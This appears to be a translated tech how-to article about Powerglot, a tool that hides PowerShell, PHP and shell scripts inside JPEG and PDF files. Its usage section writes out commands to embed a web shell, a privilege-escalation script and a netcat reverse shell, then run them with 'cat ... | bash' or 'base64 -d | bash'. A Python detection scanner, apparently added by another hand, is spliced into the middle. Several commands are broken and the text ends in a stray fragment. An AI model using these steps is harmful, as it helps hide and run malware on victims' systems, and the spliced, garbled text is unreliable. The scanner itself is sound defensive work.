
What Is the Powerglot Tool?

2025-04-11 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31

This article describes what the Powerglot tool is. The editor finds it very practical and shares it here for reference.

Powerglot

Powerglot is an offensive PowerShell script encoding tool built on polyglots. In essence, Powerglot is an offensive security tool useful for malware, privilege escalation, lateral movement, and reverse shells.

Powerglot uses polyglots to encode various types of scripts, such as offensive PowerShell scripts, and does not need a loader to run the payload.

In red team exercises and other offensive tasks, payloads are generally camouflaged or hidden with steganography, especially to avoid network-layer protection mechanisms; this is also a common technique in PowerShell payload development. Recent malware and APT groups have used similar methods, including APT32, APT37, Ursnif, Powload, LightNeuron/Turla, Platinum APT, Waterbug/Turla, Lokibot, the Dukes and Titanium.

Powerglot is a multi-functional, cross-platform offensive and defensive tool based on polyglots. It allows developers to hide script code (PowerShell, shell scripts, PHP, etc.) in digital images, and its developers are adding support for new file formats. Unlike other offensive tools or malware, Powerglot does not need any loader to execute the information hidden in the target file, which minimizes the noise a malicious program makes on the target system.

Powerglot has a clear use in offensive and penetration-testing work, but it is also useful to blue team researchers. As far as we know, it is the first general and completely open source tool that lets researchers search for information hidden with polyglots, information that could be used to hide malware or to achieve persistence on a target system.

Function introduction

Code such as PowerShell, shell scripts and PHP is encoded into an image file, and the hidden information (payload) can be recovered and executed without any loader. Powerglot is designed for a variety of file formats, but currently supports only JPEG and PDF; support for other formats is under development.

Powerglot is a completely open source tool that can help researchers detect malicious code, especially content hidden by public tools such as Truepolyglot or stegoSploit. The developers are currently adding support for JPEG, PNG, GIF, BMP, ZIP, PDF, MP3 and other formats.
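For the blue-team use described above, the following added example (not code from Powerglot or from the original article) walks a JPEG's segment chain and flags script-like text in comment/application segments or after the end-of-image marker. It is a generic heuristic, not Powerglot's own detection logic; the marker list and the sample byte strings are constructed for illustration.

```python
# Heuristic token list (an assumption of this example, not taken from Powerglot).
SCRIPT_MARKERS = (b"#!/bin/", b"<?php", b"| bash", b"base64 -d", b"invoke-", b"pwsh")
NOT_A_MARKER = {0x00, *range(0xD0, 0xD8)}  # stuffed 0xFF00 and RSTn inside scan data

def _hits(blob, where):
    low = blob.lower()
    return [f"script marker {m.decode()!r} in {where}" for m in SCRIPT_MARKERS if m in low]

def scan_jpeg(data):
    """Walk the JPEG segment chain and return a list of findings (empty = nothing flagged)."""
    if data[:2] != b"\xff\xd8":
        return ["missing SOI marker"]
    findings, pos, end = [], 2, len(data)
    while pos + 1 < end:
        if data[pos] != 0xFF:
            return findings + [f"broken segment chain at offset {pos}"]
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:  # EOI: a plain image has nothing meaningful after it
            trailer = data[pos + 2:]
            if trailer.strip(b"\x00\r\n"):
                findings.append(f"{len(trailer)} bytes after EOI")
                findings += _hits(trailer, "trailer")
            return findings
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > end:
            return findings + [f"truncated segment at offset {pos}"]
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:  # COM and APPn carry free-form bytes
            findings += _hits(data[pos + 4:pos + 2 + length], f"segment 0x{marker:02X} at offset {pos}")
        pos += 2 + length
        if marker == 0xDA:  # SOS: skip entropy-coded data up to the next real marker
            while pos + 1 < end and not (data[pos] == 0xFF and data[pos + 1] not in NOT_A_MARKER):
                pos += 1
    return findings + ["no EOI marker"]

def _seg(marker, body):
    return bytes([0xFF, marker]) + (len(body) + 2).to_bytes(2, "big") + body

# Constructed sample inputs (structurally valid segment chains, not real photographs).
_HEAD = b"\xff\xd8" + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
_SCAN = _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00") + b"\x12\x34\xff\x00\x56" + b"\xff\xd9"
CLEAN = _HEAD + _SCAN
IN_COMMENT = _HEAD + _seg(0xFE, b"\n#!/bin/sh\necho test\n") + _SCAN
AFTER_EOI = CLEAN + b"\n<?php echo 1; ?>\n"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("comment", IN_COMMENT), ("trailer", AFTER_EOI)):
        print(name, scan_jpeg(blob) or "ok")
```

A hit is a reason to inspect the file, not proof of a payload: metadata written by editing software can occasionally match a token, so tune the list to your environment.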

Tool installation

# git clone https://github.com/mindcrypt/powerglot
# python3 powerglot

Tool use & parameters

Here are some examples of how to use Powerglot to hide Payload:

Example 1 - hide a PowerShell/PHP/shell script in a JPEG image:

# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg
# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg
# python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg

Example 2 - hide a privilege-escalation shell script in a JPEG image:

# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg
# file cat-linenum.jpg (It is a valid JPEG file)
# feh cat-lineum.jpg (The image is properly showed in an image viewer)
# We can execute the script in several ways:
a) cat cat-linenum | bash
b) chmod +x cat-linenum.jpeg ./cat-linenum.jpeg

Example 3 - hide a netcat reverse channel in a JPEG image:

# Attacker
# echo "nc 127.0.0.1 4444" > netcat.sh
# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg
# nc -nvlp 4444
# Victim
# chmod +x cat-netcat.jpg | ./cat-netcat.jpg

Example 4 - PDF hiding:

# Create b64.sh with your favourite payload
base64 Linenum.sh -w 0 > b64.sh
# Edit b64.sh
echo "code in b64.sh" | base64 -d | bash
# python3 powerglot -o b64.sh sample.pdf test.pdf
# file test.pdf
# xpdf test.pdf
# Execute payload
# cat test.pdf | bash or chmod +x test.pdf; ./test.pdf

Example 5:

# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg
# file cat-ps.jpeg
# feh cat-ps.jpeg
# Execute payload (example)
# cat cat-ps.jpeg | pwsh
PS /home/alfonso/PowerGlot/POWERSHELL> get-process

[Suspicious file]-[./cat-end-extra1.jpg]..
